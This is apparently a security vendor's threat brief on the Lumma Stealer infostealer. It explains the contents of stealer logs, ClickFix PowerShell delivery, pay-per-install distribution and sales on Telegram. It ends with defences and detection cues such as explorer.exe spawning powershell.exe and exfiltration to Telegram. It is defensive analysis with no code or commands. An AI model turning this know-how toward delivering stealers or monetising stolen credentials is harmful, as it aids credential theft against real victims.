Loot, load, and repeat: dissecting the Lumma Stealer playbook
Threat brief - May 8, 2025
Overview
Cybercriminals are always seeking easy and fast money. Around 2015, an information stealer known as Pony gained popularity for its ability to extract credentials saved in web browsers. Easily accessible online, Pony was leveraged by a wide variety of criminals who aimed to distribute the malware to as many victims as possible and mine stored credentials for accounts that could be directly monetized (e.g., banking and cryptocurrency accounts) or sold on underground markets (e.g., streaming services, gaming accounts, and online shops). The stolen data was compiled into a bundled ZIP file typically called a log (or “лог”). Although we don’t see much of Pony today, there have been many generations of improved information stealers along the way, including some that have become very widespread like Lumma Stealer (also known as LummaC2).
We care a lot about information stealing malware because the impact can be significant. In addition to potentially compromising an individual victim’s financial accounts, the credentials exfiltrated by information stealing malware are mined by initial access brokers who find remote access accounts for enterprise environments that could later be sold as entry points for ransomware operations. The initial access broker typically sells a single corporate access credential for anywhere from a few hundred dollars to several thousand dollars, depending on factors such as the target organization’s number of computers, industry, geographic location, and annual revenue. An individual bundle of credentials for a machine sold on a criminal market may range in price from $1 to $100 or more based on the type of accounts present and the locality. The LummaC2 marketplace, as depicted below, includes search capabilities for domains, countries, cryptocurrency wallets, and credentials, with some data offered exclusively to a single buyer.
LummaC2’s Marketplace
What’s in a Lumma log?
An infostealer log is a single bundle of files that may include credentials saved in a web browser, autofill files, cryptocurrency wallets, lists of processes, application data, and other valuable information about the compromised machine that could be monetized. Below is an example of a filename for a LummaC2 log:
[US ][MetaMask Phantom]<redacted>.234.46.59[1744493224].zip
The filename shows the two-letter country code of the victim’s location, some hint about valuable applications present (i.e., MetaMask and Phantom), the IP address of the victim, and the Unix timestamp when the log was created. Inside the ZIP archive are the following files and folders:
| Files | Folders |
|---|---|
All Passwords.txt | Applications/ |
Brute.txt | Chrome/ |
Clipboard.txt | Cookies/ |
DomainDetect.txt | Edge/ |
Processes.txt | Files/ |
Screen.png | Opera/ |
Software.txt | Wallets/ |
System.txt |
Many of the folders and filenames in a LummaC2 log are self-explanatory. For example, the file named “Brute.txt” contains a list of just passwords with no associated usernames or context—useful to criminals attempting to brute-force encrypted cryptocurrency wallets. Each browser is assigned a folder (e.g., “Chrome” in the table above), which typically includes saved credentials and an autofill file that may contain sensitive personal information such as names, addresses, phone numbers, and even search terms. The “Files” folder often includes content taken from the victim’s Downloads, Documents, or Desktop folders, where attackers may find password lists or recovery phrases for cryptocurrency wallets.
The “Screen.png” file is a screenshot of the victim’s desktop and can reveal whether the malware is being run in a sandbox—for example, if a corporate logo appears in the background image. The “System.txt” file contains system-level information such as the execution path of the malware, the build ID, and sometimes advertisements or contact information for stealer log tools. It may also reference services like wallet cracking and Telegram channels offering support for the malware.
Most information stealers that do business on the Russian language crime forums, like Exploit and XSS, have rules forbidding the use of the malware within the Russian Federation. Although logs from Russian victims are less common than those from other countries, they do appear in bulk collections—often including individuals who appear to be Russian nationals living abroad.
How does Lumma get onto victim machines?
Recent information stealer campaigns typically involve social engineering rather than the exploitation of a vulnerability. Microsoft and other security researchers have documented a technique known as ClickFix. In this approach, users who visit compromised websites or encounter malicious ads are presented with a deceptive modal popup, warning them of urgent issues with their computer. The popup instructs users to execute keyboard shortcuts that launch a remote PowerShell script, which then downloads and runs a payload—such as LummaC2.
Lumma’s payloads are typically spread using pay-per-install (PPI) networks or traffic sellers that deliver installs as a service. The price typically depends on the location of the install and if the target device is a mobile phone or a desktop computer. Lumma and many other information stealers are often bundled with cracked versions of popular commercial software, targeting users looking to avoid paying for legitimate licenses. To make matters worse, the operators behind LummaC2 invest significant effort into ensuring their malware evades detection by popular antivirus solutions.
Where and how is Lumma sold?
Lumma is a MaaS (Malware-as-a-Service) information stealer that has been advertised on crime forums like Exploit shown below.
LummaC2’s advertisement on Exploit from February 2023
Although its initial launch and updates have been promoted on these forums, LummaC2 primarily conducts business through Telegram, where it maintains dedicated (and relatively anonymous) channels for customer support, distribution of updates, and sales. These Telegram channels leverage bots to automate tasks such as licensing, payload generation, and log management, offering a streamlined experience for criminal operators. LummaC2 is known for its frequent version updates, support for a wide range of browsers and cryptocurrency wallets, and a focus on detection evasion. Its logs, as noted earlier, often include credentials, autofill data, system details, and files scraped from user directories, making it valuable for both financial fraud and initial access brokers.
How to defend against Lumma
Properly defending against Lumma Stealer involves a layered security approach, since it’s a fast-evolving infostealer often delivered via malvertising, phishing, or compromised software. Enterprise defenders should carefully restrict access to new domains, as newly registered domains (NRDs) are a common tactic extensively used by LummaC2. Users outside of an enterprise may consider limiting or preventing the execution of PowerShell and other scripts if it is not required. Enterprise defenders should also consider the following:
Endpoint protection and hardening
Do not permit users to download executable files from untrusted websites
Do not permit users to download or execute scripts or Microsoft Office macros that were downloaded from the internet, are unsigned, or that are not explicitly allowed by policy
Use reputable endpoint detection and response (EDR) tools that can detect suspicious behaviors, like credential scraping or unauthorized file access
Application allowlisting to prevent unknown executables (including downloaded payloads) from running.
Disable PowerShell for non-administrative users, or use constrained language mode to reduce abuse risk
Browser and credential hygiene
Avoid saving passwords in browsers—use a dedicated password manager instead
Clear autofill data and browser caches regularly
Disable autofill for sensitive information like names, phone numbers, or addresses, especially on corporate machines
Patch and update regularly
Keep browsers, operating systems, and all software up to date to reduce exploitability via known vulnerabilities
DNS and network filtering
Use secure DNS filtering and threat intelligence-based blocklists to prevent connections to NRDs, known C2 servers, malware delivery domains, and Telegram APIs used for data exfiltration
Email and web filtering
Implement malicious attachment and link detection in email gateways
Deploy browser isolation or sandboxing to reduce the risk of drive-by downloads from malvertising
User training
Educate users about malvertising, fake software installers, and browser scareware tactics like ClickFix, which are common delivery mechanisms
Warn users not to run PowerShell scripts or click on scare popups instructing them to “fix” computer issues
Detection and threat hunting
Monitor for:
Unusual outbound connections (especially to Telegram or rare domains)
Unauthorized credential access from browsers
Suspicious PowerShell or process spawning activity (e.g., explorer.exe spawning powershell.exe)
